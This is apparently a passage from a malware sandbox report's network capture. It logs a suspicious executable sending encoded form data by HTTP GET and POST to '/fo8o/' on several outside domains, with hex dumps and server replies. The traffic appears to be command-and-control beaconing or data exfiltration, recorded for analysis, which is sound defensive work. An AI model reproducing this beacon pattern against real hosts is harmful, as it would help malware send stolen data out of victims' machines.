Jun 26, 2024 14:56:28.290158033 CEST	517	OUT	GET /fo8o/?Y8F=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:56:28.977847099 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 26 Jun 2024 12:56:28 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-06-26T12:56:33.8745070Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	65231	91.195.240.94	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:34.064244986 CEST	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 4d 38 45 65 4e 56 32 71 43 59 59 32 64 72 47 6d 77 6a 52 56 68 44 61 6e 55 34 4d 5a 48 58 68 58 54 42 65 30 50 30 3d Data Ascii: Y8F=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=
Jun 26, 2024 14:56:34.721060991 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Wed, 26 Jun 2024 12:56:34 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	65232	91.195.240.94	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:36.604502916 CEST	801	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 76 69 33 48 77 37 49 33 32 49 4e 77 52 75 71 59 69 72 31 39 44 73 35 46 2f 48 61 6e 6e 55 34 52 42 43 41 4a 64 66 Data Ascii: Y8F=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf
Jun 26, 2024 14:56:37.230319023 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Wed, 26 Jun 2024 12:56:37 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	65233	91.195.240.94	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:39.136868000 CEST	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 7a 4c 67 61 41 33 54 2f 58 6f 6d 65 44 6d 76 4b 79 68 45 33 61 76 52 31 66 53 45 79 67 58 6e 59 6b 47 6d 6c 67 4e 56 51 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 50 65 63 43 6a 7a 4b 39 73 77 44 57 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 4a [TRUNCATED] Data Ascii: Y8F=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbumzLgaA3T/XomeDmvKyhE3avR1fSEygXnYkGmlgNVQehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUPecCjzK9swDWayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdB9+BuOOEs4LKirthC28h2UyW7au3cW4PlACw9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvO/iZcESC7N+cDrmgluCEHjfQXc0V2cvBN6bVduPb1dXYDe5/WGT/pCef4uOWdjBYB3f2EIBwROeAD75Mkn4n9Gbm9RO9xHMSnAUWNtBfPdhdkU+HNFMIly/4KFW2Y3PE1IR2k1a68+R8/BBBBOIwVSCGCeSfnbUZzQBeUWLBT22wRNNq+pkmWyRUDpFvf2jyfm3jS5K5KbFyo+Q/N6MUOpbO4V9IW5yGU9dOvkF68jtOUwQnVuE34QDrlXP9Q7Q8RIajk+fsL6l23HbWMc5Rs6ZOhHPv/oN0K9yBpnczxPQwb/nUR7UgEKZD1DjVw/Itpwyrh2mukh9gARKuIkh6Dw0GhJs5mUjJZ5ykBfSPKYkHSaDVs8H6iFEa0XmrFHU8AZOyE6oSxQ5c7MfQUmgtQ950qfdhIgaLeofjVX6RZdPen2hXitfVv/8m4jR37t0NuhY5JWHwSC2h6mRHsY/Wrxf1b0F8wpfgYsZD2q/QAl3ByJjp3n6dvdP3bj+k0a9v6QyqIR5IJSPY60M8i [TRUNCATED]
Jun 26, 2024 14:56:39.767164946 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Wed, 26 Jun 2024 12:56:39 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	65234	91.195.240.94	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:41.679671049 CEST	518	OUT	GET /fo8o/?Y8F=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:56:42.351499081 CEST	1236	IN	HTTP/1.1 200 OK date: Wed, 26 Jun 2024 12:56:42 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_BLyIMANDkDZD4KMNgY3AWWgV/t7re6FFJPQqDtM9o0JSLWEkopxsgM01ZtfC2GxxPeyvb5Ik38gP4S6pAAW+hA== last-modified: Wed, 26 Jun 2024 12:56:42 GMT x-cache-miss-from: parking-6887b75b49-2dgds server: Parking/1.0 connection: close Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 42 4c 79 49 4d 41 4e 44 6b 44 5a 44 34 4b 4d 4e 67 59 33 41 57 57 67 56 2f 74 37 72 65 36 46 46 4a 50 51 71 44 74 4d 39 6f 30 4a 53 4c 57 45 6b 6f 70 78 73 67 4d 30 31 5a 74 66 43 32 47 78 78 50 65 79 76 62 35 49 6b 33 38 67 50 34 53 36 70 41 41 57 2b 68 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_BLyIMANDkDZD4KMNgY3AWWgV/t7re6FFJPQqDtM9o0JSLWEkopxsgM01ZtfC2GxxPeyvb5Ik38gP4S6pAAW+hA==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
Jun 26, 2024 14:56:42.351555109 CEST	1236	IN	Data Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 Data Ascii: on youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchAECing for!"><link rel="icon" type="image/png" href="//img.
Jun 26, 2024 14:56:42.351591110 CEST	1236	IN	Data Raw: 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
Jun 26, 2024 14:56:42.351624012 CEST	372	IN	Data Raw: 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e Data Ascii: h]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:n
Jun 26, 2024 14:56:42.351658106 CEST	1236	IN	Data Raw: 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e Data Ascii: .container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#717171}.container-conten576t{margin:25px auto 20px auto;text-align:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png")
Jun 26, 2024 14:56:42.351691961 CEST	1236	IN	Data Raw: 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 37 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c Data Ascii: t__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#0a48ff}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#000}.two-tier-ads-list__list-element-link{font
Jun 26, 2024 14:56:42.351726055 CEST	1236	IN	Data Raw: 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 69 6e 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 66 6f 6e Data Ascii: ntainer-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#919da6}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searchbox{margin-bottom:
Jun 26, 2024 14:56:42.351759911 CEST	1236	IN	Data Raw: 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 Data Ascii: container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{font-size:10px;color:#555}.container-cookie-message{position:fixed;bottom:0;width:100%;background:#5f5f5f;f
Jun 26, 2024 14:56:42.351819992 CEST	1236	IN	Data Raw: 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 35 30 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 65 6d 7d 2e Data Ascii: nline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;border-collapse:collapse}.cookie-modal-window__content-body ta
Jun 26, 2024 14:56:42.351872921 CEST	1236	IN	Data Raw: 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 73 77 69 74 63 68 20 69 6e 70 75 74 7b 6f 70 61 63 69 74 79 3a Data Ascii: r:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bo
Jun 26, 2024 14:56:42.357126951 CEST	995	IN	Data Raw: 22 2f 2f 77 77 77 2e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 22 2c 22 64 6e 73 68 22 3a 74 72 75 65 2c 22 64 70 73 68 22 3a 66 61 6c 73 65 2c 22 74 6f 53 65 6c 6c 22 3a 66 61 6c 73 65 2c 22 63 64 6e 48 6f 73 74 22 3a 22 69 6d 67 2e 73 65 64 Data Ascii: "//www.rssnewscast.com","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	65235	66.29.149.46	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:55.754209042 CEST	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 